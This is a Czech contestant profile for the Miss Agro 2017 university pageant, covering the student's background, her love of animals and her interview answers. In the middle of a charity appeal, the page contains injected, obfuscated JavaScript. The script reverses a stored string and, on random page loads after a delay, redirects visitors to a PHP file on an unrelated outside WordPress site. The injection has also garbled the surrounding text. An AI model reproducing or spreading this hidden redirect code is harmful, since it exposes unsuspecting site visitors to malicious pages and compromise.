Nikola Holanová

Profil

Fotografie

Fakulta: PEF
Obor: Podnikání a administrativa (PAAN)
Ročník: 4.
Věk:
23

Nikola, neboli Holan, jak jí říkají kamarádi, pochází z krásného českého města s bohatou historií – Kutné Hory. Zde vyrůstala, studovala, pracovala a mimo jiné také provázela turisty stříbrným dolem.  Miluje zvířata, a proto se stala vegankou. Pracuje jako dobrovolnice v kočičím útulku, kde pomáhá s péčí o zraněné, nemocné a opuštěné kočky. Již od dětství je zapálenou fanynkou kouzelného světa Harryho Pottera, z čehož nejspíš nikdy nevyroste. Nedá dopustit na svou rodinu a přátele.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523996541{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2017?

Když jsem byla malá a spolužáci se mi posmívali, že jsem tlustá a ošklivá, nenapadlo by mě ani ve snu, že bych se někdy mohla do takovéto soutěže vůbec dostat. Takže už jen fakt, že jsem ve finále, je pro mě velkou výhrou.

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Tato otázka je mnohem těžší, než se na první pohled zdá. Jsem spokojená s tím, jak jsem se narodila v současném životě. Mám skvělou rodinu, podporujícího přítele a ty nejbožejší kámoše, a to je něco, za co jsem neskutečně vděčná a neměnila bych. Kdybych si však měla vybrat jiný život, brala bych ten svojí kočičí princezny Amynky. Celý den se jen válí v peřinách a má kolem sebe čtyři sluhy, kteří jí splní každé přání.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Pro studium na ČZU jsem se rozhodla v momentě, když jsem se procházela po zdejším školním areálu mezi rozkvetlými stromy a záhony, kolem šumící fontány, až ke stájím se zvířátky. V tu chvíli jsem se do prostředí zemědělky zamilovala, protože hezčí kampus nikdo nemá! Nejraději mám jak jinak než zvířátka, s kterými se chodím ve chvílích volna mazlit. Mými oblíbenci jsou prasátka, která milují drbání za ušima, a kravičky. Jen z lam mám trochu respekt, protože prý plivou.